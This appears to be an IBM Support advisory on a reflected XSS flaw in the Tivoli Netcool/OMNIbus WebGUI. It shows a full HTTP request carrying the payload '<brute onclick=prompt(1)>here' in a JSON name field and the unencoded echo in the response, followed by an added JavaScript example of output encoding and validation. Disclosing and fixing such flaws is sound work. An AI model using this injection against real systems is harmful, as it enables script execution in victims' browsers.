IBM Support

Non-Persistent Cross-Site Scripting (XSS) vulnerability in WebGUI

Troubleshooting


Problem

The application server does not encode special characters in the value it reflects back, so a submitted name containing markup is returned verbatim in the error message and is interpreted by the browser as HTML/JavaScript. The HTTP request and response below show the behaviour.

HTTP Request:

POST /ibm/console/webtop/raapi/relationships/ HTTP/1.1
Host: <hostname>:16311
Connection: close
Content-Length: 294
Accept: application/javascript, application/json
Origin: https://<hostname>:16311
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://<hostname>:16311/ibm/console/contentRender.do?oid=_2114102044&pageid=item.admin.navigationElement.RelationshipEditor;com.ibm.tivoli.em.iscmodule&XSS=56a286028ad6b8fb5b5cc0823e441fbe
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: -- omitted --

{"name":"<brute onclick=prompt(1)>here","displayName":"here1","displayNameKey":"","description":"xsstest","descriptionKey":"","dataSources":"DSP","multiDSAggregationEnabled":"false","definition":{"type":"relationshipColumn","relationshipColumn":{"column":"AckTime","keyColumn":"Acknowledged"}}}

HTTP Response:

HTTP/1.1 400 Bad Request
X-Powered-By: Servlet/3.0
Content-Type: application/json
Content-Language: en-US
Connection: Close
Content-Length: 62

{"message":"<brute onclick=prompt(1)>here is an invalid name"}

The rejected name is echoed unencoded inside the "message" field; when the WebGUI page renders that message, the payload is executed and a dialog box pops up on screen.
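As an added illustration, not IBM's code and not part of this article, the following JavaScript contrasts the rendering pattern that causes the problem above (concatenating the returned "message" field into HTML, which is what assigning innerHTML amounts to) with an encoded rendering, and shows a server-side validator that reports a rejection without echoing the offending value at all. The sample response body is constructed from the response shown above; the name policy regex and all function names are assumptions made for the example.

```javascript
// Added example (not IBM's code): handling a JSON error message that echoes
// user input so that it cannot execute as script when displayed.

// Constructed sample of the server response body from the advisory above.
const sampleResponse = '{"message":"<brute onclick=prompt(1)>here is an invalid name"}';

// HTML-encode the characters that change meaning when a string is placed in
// HTML body text or an attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the message is concatenated into markup verbatim.
// In a browser this is the same as `errorBox.innerHTML = ... + message + ...`.
function renderUnsafe(message) {
  return '<div class="error">' + message + '</div>';
}

// Hardened rendering: encode before concatenating. In a browser the simpler
// equivalent is `errorBox.textContent = message`, which never parses markup.
function renderSafe(message) {
  return '<div class="error">' + escapeHtml(message) + '</div>';
}

// Server side: validate against an allow-list (assumed policy for this example)
// and describe the rejection without repeating the submitted value.
function validateName(name) {
  return /^[A-Za-z0-9_ .-]{1,64}$/.test(name);
}

function buildErrorBody(name) {
  if (validateName(name)) {
    return null; // no error
  }
  return JSON.stringify({
    message: 'The supplied name contains characters that are not allowed',
  });
}

// Review check for captured responses: does the "message" field carry a raw
// tag start? Useful when auditing an API for reflected, unencoded input.
function messageHasRawMarkup(jsonText) {
  const body = JSON.parse(jsonText);
  return typeof body.message === 'string' && /<[A-Za-z!/]/.test(body.message);
}

// Demonstration run on the constructed sample.
const msg = JSON.parse(sampleResponse).message;
console.log('unsafe :', renderUnsafe(msg));
console.log('safe   :', renderSafe(msg));
console.log('raw markup in sample response:', messageHasRawMarkup(sampleResponse));
console.log('hardened server body:', buildErrorBody(msg));
```

The encoding in renderSafe belongs at the point where the value is placed into HTML; the JSON body itself is a data format and should carry the plain string, which is why buildErrorBody avoids the problem by not echoing the value rather than by HTML-encoding it inside JSON.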

Document Location

Worldwide

Product: Tivoli Netcool/OMNIbus (IBM Software)
Component: WebGUI
Platform: Platform Independent
Version: 8.1.0.14


Document Information

Modified date:
09 May 2025

UID

ibm11143232